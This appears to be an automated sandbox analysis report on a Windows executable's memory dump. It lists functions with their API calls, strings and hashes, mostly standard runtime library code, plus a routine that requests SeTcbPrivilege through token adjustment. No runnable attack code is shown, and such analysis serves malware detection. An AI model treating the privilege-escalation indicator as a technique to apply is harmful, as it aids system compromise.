Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$GetcvtLockit::_Lockit::~_$Facet_Register
String ID: false$true$~`|+
API String ID: 1613545823-2071882360
Opcode ID: 37c6a0dfc50b9a0d64e217e17b2d5cd4be436a4a7ef63081a42bad35a139dd1f
Instruction ID: fb793f948decbf74830e077e3bb374d58b029366f76b954405a0ee26874c8501
Opcode Fuzzy Hash: 37c6a0dfc50b9a0d64e217e17b2d5cd4be436a4a7ef63081a42bad35a139dd1f
Instruction Fuzzy Hash: F151BC71D002589FEB20DF64D881BAEB7B4FF44304F10816FE505AB381DB79AA45CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004AC4A0, Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004AC4B2

Part of subcall function 004AC004: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004AC027

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 004AC4D3
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 004AC4E0
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 004AC52E
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 004AC5D6
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 004AC608

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: 5c1309bff6215ad95eb75ec43066627a7d80d0ee4cdb4e9e996314d78c3962a6
Instruction ID: 6aa9af9e5d67f3bfac01ae0fc2b93e8ab8647504774f7ddeb7ae6e30c6ecb596
Opcode Fuzzy Hash: 5c1309bff6215ad95eb75ec43066627a7d80d0ee4cdb4e9e996314d78c3962a6
Instruction Fuzzy Hash: 7E719C70900259ABDF45DF54C980ABFBBB2AF66308F04409AFC416B392C73A9D15DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004403F0, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 162COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,2B7C607E,?,?), ref: 00440437
GetCurrentProcess.KERNEL32(00000020,SeTcbPrivilege,0000000E), ref: 004404B1
GetLastError.KERNEL32 ref: 0044052A

Strings

SeTcbPrivilege, xrefs: 0044048E
CToken::SetTokenPrivilege(): LookupPrivilegeValue() failed, xrefs: 004405E7
~`|+, xrefs: 00440415, 00440555
CToken::SetTokenPrivilege(): AdjustTokenPrivileges() returned ERROR_NOT_ALL_ASSIGNED, xrefs: 0044064D
CToken::SetTokenPrivilege(): AdjustTokenPrivileges() failed, xrefs: 0044061A
~`|+, xrefs: 00440407

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentProcess$ErrorLast
String ID: CToken::SetTokenPrivilege(): AdjustTokenPrivileges() failed$CToken::SetTokenPrivilege(): AdjustTokenPrivileges() returned ERROR_NOT_ALL_ASSIGNED$CToken::SetTokenPrivilege(): LookupPrivilegeValue() failed$SeTcbPrivilege$~`|+$~`|+
API String ID: 1435421422-3724696504
Opcode ID: 376267e3f01857c0d10298f7ecccab223672cd658b12ed21ec6b792b9334b228
Instruction ID: e26bc43006aa6838d9cb1c502b034ec9087a784812d36877fa56648b1c0008b2
Opcode Fuzzy Hash: 376267e3f01857c0d10298f7ecccab223672cd658b12ed21ec6b792b9334b228
Instruction Fuzzy Hash: 2651A330D00248EFEB10DBA1DD46BEEBBB8EF14304F50416AE515B7291EB786A48CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0049ED40, Relevance: 15.1, APIs: 10, Instructions: 144COMMON

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0049ED85
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 0049EDB7
List.LIBCONCRT ref: 0049EDF2
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 0049EE03
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 0049EE1F
List.LIBCONCRT ref: 0049EE5A
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 0049EE6B
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 0049EE86
List.LIBCONCRT ref: 0049EEC1
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 0049EECE

Part of subcall function 0049E201: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 0049E219
Part of subcall function 0049E201: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 0049E22B

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 6884f3af704839e5a46e7cf1d5ca743afec47557d0d3613fd4e21e8f4a547b1e
Instruction ID: a3905f68af6ce62bff71d78064dedb570a5d97b4d7a811a892b8c31ae890640f
Opcode Fuzzy Hash: 6884f3af704839e5a46e7cf1d5ca743afec47557d0d3613fd4e21e8f4a547b1e
Instruction Fuzzy Hash: 50516170A00209AFDF14DF66C595BEE7BA8BF08344F01457AE915A7341DB38EE05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00452A68, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 308COMMON

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00452B63
___TypeMatch.LIBVCRUNTIME ref: 00452C96
IsInExceptionSpec.LIBVCRUNTIME ref: 00452D71
_UnwindNestedFrames.LIBCMT ref: 00452DF8
CallUnexpected.LIBVCRUNTIME ref: 00452E13

Strings

csm, xrefs: 00452AA3
csm, xrefs: 00452BC1
csm, xrefs: 00452B10

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwind
String ID: csm$csm$csm
API String ID: 1184646756-393685449
Opcode ID: 71b5d8063e79be1759f68ccd3e04485866c38daae0752fc3c4a6c4011be9ee3a
Instruction ID: 1fd50185e191c93cf3e51c8258f10d6a11389c3c903ae711f675eb8f7514e4a8
Opcode Fuzzy Hash: 71b5d8063e79be1759f68ccd3e04485866c38daae0752fc3c4a6c4011be9ee3a
Instruction Fuzzy Hash: 1EC19C71800209AFCF19DFA5CA819AFBB75BF16306F04415BEC106B213C3B9DA59CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004471D0, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(00100002,00000000,00000000,2B7C607E), ref: 004473B0
CloseHandle.KERNEL32(00000000), ref: 004473C5
ResetEvent.KERNEL32(00000000,2B7C607E), ref: 004473D3
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00447426
CloseHandle.KERNEL32(00000000), ref: 0044743B
CloseHandle.KERNEL32(00000000,2B7C607E), ref: 00447461
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,2B7C607E), ref: 004474BB
CloseHandle.KERNEL32(00000000), ref: 004474D0

Strings

~`|+, xrefs: 00447324

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEventHandle$Create$OpenReset
String ID: ~`|+
API String ID: 3337962467-3443854377
Opcode ID: 5470f01b186334aa73e377e45f508bc41cdab9095a44d0c3eff13555cc5596a4
Instruction ID: 1824544d415b701d1740f718f9735ac615d6fc72a823b0bee1fbdc02040da8f8
Opcode Fuzzy Hash: 5470f01b186334aa73e377e45f508bc41cdab9095a44d0c3eff13555cc5596a4
Instruction Fuzzy Hash: 4E81E2319042049FEB24DFA4DC48B6EBBB5FF45314F144A1EE859D7780D778A845CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0049F6FE, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 0049F74A
SwitchToThread.KERNEL32(?), ref: 0049F76D
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 0049F78C
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0049F7A8
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 0049F7B3
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0049F7DA

Strings

ppVirtualProcessorRoots, xrefs: 0049F7D2
count, xrefs: 0049F718

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3791123369-3650809737
Opcode ID: 42182f2635fef17e37c33f2d97fa2a9570f304eee2445053ff3b18e79a306c19
Instruction ID: ab04b16c4a7ac5085e1b2b61e41958ab4e054f05c3ccef2f588621322668c2ab
Opcode Fuzzy Hash: 42182f2635fef17e37c33f2d97fa2a9570f304eee2445053ff3b18e79a306c19
Instruction Fuzzy Hash: 9E215534A00205AFCF04EFA5C9959AE7BB5FF45354F5440BBE901A7351DB38AD05CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0049F190, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0049F1AA
GetCurrentProcess.KERNEL32 ref: 0049F1B2
DuplicateHandle.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00000000,00000002), ref: 0049F1C7
SafeRWList.LIBCONCRT ref: 0049F1E7

Part of subcall function 0049D147: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0049D158
Part of subcall function 0049D147: List.LIBCMT ref: 0049D162

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0049F1F9
GetLastError.KERNEL32 ref: 0049F208
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0049F21E

Strings

eventObject, xrefs: 0049F1F1

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorHandleLastLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 165577817-1680012138
Opcode ID: c48d74ea5e2a878a014d2152f4a4b81d079db0f02bebf8b07d4a76ef98a97d3f
Instruction ID: 50d02663730604d1fcb64c7d759ca7d04fda9a7a7cca234387441279c9bcbba7
Opcode Fuzzy Hash: c48d74ea5e2a878a014d2152f4a4b81d079db0f02bebf8b07d4a76ef98a97d3f
Instruction Fuzzy Hash: 86110635500205EBDF14FBA5DC4AFEE3B68AB04311F20417AB616E51D1DB789908C76D

Uniqueness

Uniqueness Score: -1.00%

Function 0044EAD3, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?), ref: 0044EAE5
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800), ref: 0044EAFA
DecodePointer.KERNEL32(?), ref: 0044EB76

Strings

AtlThunk_InitData, xrefs: 0044EB22
AtlThunk_DataToCode, xrefs: 0044EB39
AtlThunk_FreeData, xrefs: 0044EB50
atlthunk.dll, xrefs: 0044EAF5
AtlThunk_AllocateData, xrefs: 0044EB0B

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: a916d4707589ce712d942ad4b09111f245de163d068b5c68b95d9953e537ff4e
Instruction ID: fe4382b6cb6ba3484a6141569151e6af2c4dec135c6d8a59d4bff66c7fb709d5
Opcode Fuzzy Hash: a916d4707589ce712d942ad4b09111f245de163d068b5c68b95d9953e537ff4e
Instruction Fuzzy Hash: 7F01E17054034877FA01A7239C0AFE63B55FF02749F144067B80676392DB9CA916C19E

Uniqueness

Uniqueness Score: -1.00%

Function 00454F64, Relevance: 13.8, APIs: 9, Instructions: 338COMMON

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 00454FD3
shared_ptr.LIBCMT ref: 0045508E
operator+.LIBVCRUNTIME ref: 004550BA
DName::operator=.LIBVCRUNTIME ref: 004550D2
shared_ptr.LIBCMT ref: 004552A1
DName::operator+.LIBCMT ref: 00455332
shared_ptr.LIBCMT ref: 00455399
shared_ptr.LIBCMT ref: 004553D7
operator+.LIBVCRUNTIME ref: 004553FB

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID:
API String ID: 1464150960-0
Opcode ID: c570a79f8dbdef17d261bf00bcbed94b7b92f6a36b018e8b818e297081806fc2
Instruction ID: 8a08830c04111a2bb00ddaefd9a37c80ee54cbf11acf4fda519539a1c7d4da17
Opcode Fuzzy Hash: c570a79f8dbdef17d261bf00bcbed94b7b92f6a36b018e8b818e297081806fc2
Instruction Fuzzy Hash: 26D150B1C006099ACB10DF99C4646FEBBB4AB04346F24816BEC15AB253D77C5B4ECF99

Uniqueness

Uniqueness Score: -1.00%

Function 004678C0, Relevance: 13.7, APIs: 9, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0046792E
_free.LIBCMT ref: 0046793A
_free.LIBCMT ref: 00467A63
_free.LIBCMT ref: 00467A6E

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: cff2214869e5bbb1f78a547ed32a2393ba1db4277b4f6515da6b70edc35fd0e2
Instruction ID: 5fe7f7aac64eb1a129d77810ac04910f5748145de0ce0f882834011d674bf2b4
Opcode Fuzzy Hash: cff2214869e5bbb1f78a547ed32a2393ba1db4277b4f6515da6b70edc35fd0e2
Instruction Fuzzy Hash: A861F4719043059FDB20DFB9C841BABB7E9AB44314F10456FE945EB281FB38AE40CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004AA3A5, Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004AA3BB
GetCurrentProcess.KERNEL32(?,?,?,?,?,0049DFD0,?,?,?,?,00000000,?,00000000), ref: 004AA3CD
GetCurrentThread.KERNEL32 ref: 004AA3D5
GetCurrentProcess.KERNEL32(?,?,?,?,?,0049DFD0,?,?,?,?,00000000,?,00000000), ref: 004AA3DD
DuplicateHandle.KERNEL32(00000000,00000000,00000000,0049E074,00000000,00000000,00000002,?,?,?,?,?,0049DFD0,?,?,?), ref: 004AA3F6
Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 004AA417

Part of subcall function 004982A6: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004982C0

GetLastError.KERNEL32(?,?,?,?,?,?,?,0049DFD0,?,?,?,?,00000000,?,00000000), ref: 004AA429
GetLastError.KERNEL32(?,?,?,?,0049DFD0,?,?,?,?,00000000,?,00000000), ref: 004AA454
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004AA46A

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
String ID:
API String ID: 1293880212-0
Opcode ID: 5d8e3058cee37fdebd46692db959fa9a1d8d5c17b8a4707d5818987f0702b5a0
Instruction ID: 9a306f229952ea5f1317b66e3db5e490a75d75dbf58d9a2789889decd5484c04
Opcode Fuzzy Hash: 5d8e3058cee37fdebd46692db959fa9a1d8d5c17b8a4707d5818987f0702b5a0
Instruction Fuzzy Hash: C111F331A00301ABDB00AF759D4EFDA3BA89F1A310F14017AFA45D6252EB788800CB7F

Uniqueness

Uniqueness Score: -1.00%

Function 00462A16, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 00462A5E
__fassign.LIBCMT ref: 00462C3D
__fassign.LIBCMT ref: 00462C5A
WriteFile.KERNEL32(?,0045B9AA,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00462CA2
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00462CE2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00462D8E

Strings

~`|+, xrefs: 00462A21

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID: ~`|+
API String ID: 4031098158-3443854377
Opcode ID: 8c134611954d2ab086407123306bb453d07bc023c7bea61c29099c2fb47b9864
Instruction ID: b66348f16a73342d1831299574dcf68cf42561a970587d1eda564f22ea0f040e
Opcode Fuzzy Hash: 8c134611954d2ab086407123306bb453d07bc023c7bea61c29099c2fb47b9864
Instruction Fuzzy Hash: 30D1BC71D00658AFDF15CFA8C9809EEBBB5BF49304F28016AE815FB341E674A942CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00452570, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004525A7
___except_validate_context_record.LIBVCRUNTIME ref: 004525AF
_ValidateLocalCookies.LIBCMT ref: 00452638
__IsNonwritableInCurrentImage.LIBCMT ref: 00452663
_ValidateLocalCookies.LIBCMT ref: 004526B8

Strings

csm, xrefs: 0045264D
~`|+, xrefs: 00452622, 0045269F

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$~`|+
API String ID: 1170836740-3761916771
Opcode ID: b33989da1bb2061125d1ba277a8184b8340351adcba45393e4b24775bc69f4d9
Instruction ID: ba567eaf7c7d5b3939579102d1f307573c2a76b5b2d8a979660cce4680576105
Opcode Fuzzy Hash: b33989da1bb2061125d1ba277a8184b8340351adcba45393e4b24775bc69f4d9
Instruction Fuzzy Hash: 1241C830900208ABCF10DF69C980A9FBBA4EF46319F14805BED145B393D779EE09CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0046D0E0, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 115COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0046D1F2

Strings

Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 0046D17C
~`|+, xrefs: 0046D1DA
Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 0046D151
~`|+, xrefs: 0046D0FD, 0046D13F
~`|+, xrefs: 0046D0F0
~`|+, xrefs: 0046D0F5, 0046D1C4

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ___std_exception_copy
String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.$~`|+$~`|+$~`|+$~`|+
API String ID: 2659868963-3931984781
